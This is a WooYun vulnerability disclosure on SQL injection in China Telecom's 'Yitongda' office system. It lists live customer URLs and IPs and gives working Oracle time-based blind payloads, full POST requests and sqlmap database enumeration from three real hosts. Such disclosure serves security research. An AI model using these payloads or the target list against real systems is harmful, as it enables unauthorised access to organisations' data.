当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079398

漏洞标题:中国电信某综合办公系统SQL注入影响近4000家客户

相关厂商:中国电信

漏洞作者: 小饼仔

提交时间:2014-10-15 15:38

修复时间:2015-01-13 15:40

公开时间:2015-01-13 15:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-15: 细节已通知厂商并且等待厂商处理中
2014-10-20: 厂商已经确认,细节仅向厂商公开
2014-10-23: 细节向第三方安全合作伙伴开放
2014-12-14: 细节向核心白帽子及相关领域专家公开
2014-12-24: 细节向普通白帽子公开
2015-01-03: 细节向实习白帽子公开
2015-01-13: 细节向公众公开

简要描述:

快告诉我,挖掘机技术哪家强?

详细说明:

产品名:易通达综合办公系统
官网介绍:http://oa.fj.bnet.cn/oa/homepage/index_prod_intro.jsp 有近4000客户
2.jpg




客户案例:http://oa.fj.bnet.cn/oa/homepage/index_prod_sample.jsp



1.jpg





登入界面存在AND/OR time-based blind,官网上写有近4000家客户,google,baidu下,关键字:易通达综合办公系统
找到这些:
 
http://oa.fj.bnet.cn/oa/homepage/index.jsp 
http://www.ahomehotel.com:8081/oa/login.jsp  A家连锁酒店
http://hlbg.flylong.com.cn:8081/oa/login.jsp 汇龙集团
http://61.131.50.27:8081/oa/login.jsp 南安市教育局办公平台
http://oa.doone.com.cn/oa/login.jsp
http://220.161.217.98:8082/oa/login.jsp
http://222.77.67.205:8080/oa/login.jsp 海西信息化合作联盟
http://222.77.63.70:8081/oa/login.jsp 喜多多集团有限公司
http://218.66.159.28:8081/oa/login.jsp 泉州港务集团后渚分公司
http://202.101.116.81/oa/login.jsp

漏洞证明:

证明1:先拿官网来测试
http://oa.fj.bnet.cn/oa/homepage/index.jsp 
5.jpg




post请求:
POST /oa/LoginCheck HTTP/1.1
Host: oa.fj.bnet.cn:8082
Proxy-Connection: keep-alive
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://oa.fj.bnet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://oa.fj.bnet.cn/oa/homepage/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: JSESSIONID=5A75D4112E7D698290D1399010C961BE; JSESSIONID=391456841B314A4C7416D9219E15276D
ACCOUNT=a&STAFFID=a&PWD=a&v_code=
sqlmap:
sqlmap identified the following injection points with a total of 703 HTTP(s) requests:
---
Place: POST
Parameter: ACCOUNT
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: ACCOUNT=a') AND 2988=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||CHR(119)||CHR(99),5) AND ('OvqL'='OvqL&STAFFID=a&PWD=a&v_code=
Place: POST
Parameter: STAFFID
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: ACCOUNT=a&STAFFID=a' AND 5773=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(68)||CHR(72)||CHR(102),5) AND 'zwXS'='zwXS&PWD=a&v_code=
---
back-end DBMS: Oracle
available databases [10]:
[*] BASEDBA
[*] COMPANY
[*] FLOWCFG
[*] INTER_SEARCH
[*] LBACSYS
[*] OLAPSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] WMSYS
数据库BASEDBA的表:612张
[19:40:42] [INFO] fetching tables for database: 'BASEDBA'
[19:40:42] [INFO] fetching number of tables for database 'BASEDBA'
[19:40:42] [INFO] resumed: 612
[19:40:42] [INFO] resuming partial value: PB
[19:40:42] [INFO] retrieved: _TEST
[19:41:20] [INFO] retrieved: SMS_BAT


证明2:http://www.ahomehotel.com:8081/oa/login.jsp
6.jpg




post请求
POST /oa/LoginCheck HTTP/1.1
Host: www.ahomehotel.com:8081
Proxy-Connection: keep-alive
Content-Length: 23
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.ahomehotel.com:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.ahomehotel.com:8081/oa/login.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: JSESSIONID=A1DBF76223853C155076CF845B3CA29E; last_login_date=2014/10/14/17; staff_code=a; password=; today_login_times=1
STAFFID=a&PWD=a&v_code=
sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: STAFFID
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: STAFFID=a') AND 2145=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(77)||CHR(97)||CHR(81),5) AND ('NOWe'='NOWe&PWD=a&v_code=
---
back-end DBMS: Oracle
current user is DBA:    True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: STAFFID
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: STAFFID=a') AND 2145=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(77)||CHR(97)||CHR(81),5) AND ('NOWe'='NOWe&PWD=a&v_code=
---
back-end DBMS: Oracle
available databases [14]:
[*] BASEDBA
[*] CTXSYS
[*] DBSNMP
[*] FLOWCFG
[*] FLOWS_020100
[*] FLOWS_FILES
[*] HR
[*] INTER_SEARCH
[*] MDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] XDB
数据库BASEDBA表,有426张,这里不跑完了:
[18:11:50] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[18:11:50] [INFO] fetching tables for database: 'BASEDBA'
[18:11:50] [INFO] fetching number of tables for database 'BASEDBA'
[18:11:50] [INFO] resumed: 426
[18:11:50] [INFO] resumed: COMMON_COUNTER_TOTAL
[18:11:50] [INFO] resumed: COMPANY_ACCT
[18:11:50] [INFO] resumed: COMP_PHONE
[18:11:50] [INFO] resumed: COMP_TITLE
[18:11:50] [INFO] resumed: PATH
[18:11:50] [INFO] resumed: OFMESSAGEARCHIVE
[18:11:50] [INFO] resumed: PAPER_DEF
[18:11:50] [INFO] resumed: PAPER_INPUT_ITEM
[18:11:50] [INFO] resumed: PAPER_QUESTION
[18:11:50] [INFO] resumed: OFMUCAFFILIATION
[18:11:50] [INFO] resumed: PAPER_QUESTION_RESULT
[18:11:50] [INFO] resumed: PAPER_RESULT
[18:11:50] [INFO] resumed: OFMUCCONVERSATIONLOG
[18:11:50] [INFO] resumed: PAPER_USE_CFG
[18:11:50] [INFO] resumed: OFMUCMEMBER
[18:11:50] [INFO] resumed: NOTIFY_Q_READLIST
[18:11:50] [INFO] resumed: OA_DOC_BACK_LOG
[18:11:50] [INFO] resumed: PM_STAFF_SIGN
[18:11:50] [INFO] resumed: PATH_ERR
[18:11:50] [INFO] resumed: DDM_TOPIC_TREE
[18:11:50] [INFO] resumed: DEPT_DOC
[18:11:50] [INFO] resumed: DEPT_DOC_DIR_TREE
[18:11:50] [INFO] resumed: DEPT_DOC_PRIV
[18:11:50] [INFO] resumed: DEPT_DOC_READLIST
[18:11:50] [INFO] resumed: DEPT_FLOW_TYPE
[18:11:50] [INFO] resumed: COMMON_COUNTER_TOPIC
[18:11:50] [INFO] resumed: CONFERENCE\x02
[18:11:50] [INFO] resumed: CONTACT_CARD
[18:11:50] [INFO] resuming partial value: CONTACT_CARD_


证明3:http://222.77.63.70:8081/oa/login.jsp
7.jpg




post请求:
POST /oa/LoginCheck HTTP/1.1
Host: 222.77.63.70:8081
Proxy-Connection: keep-alive
Content-Length: 25
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://222.77.63.70:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://222.77.63.70:8081/oa/login.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: JSESSIONID=EF700AD15D2F63D8560AC7E162A08398; staff_code=aa; password=; last_login_date=2014/10/14/18; today_login_times=0
STAFFID=aa&PWD=aa&v_code=
sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: STAFFID
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: STAFFID=aa') AND 6257=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(78)||CHR(86)||CHR(101),5) AND ('Nijd'='Nijd&PWD=aa&v_code=
---
back-end DBMS: Oracle
current user is DBA:    True
available databases [14]:
[*] BASEDBA
[*] CTXSYS
[*] DBSNMP
[*] FLOWCFG
[*] FLOWS_020100
[*] FLOWS_FILES
[*] HR
[*] INTER_SEARCH
[*] MDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] XDB


修复方案:

找蓝翔

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-10-20 10:03

厂商回复:

最新状态:

暂无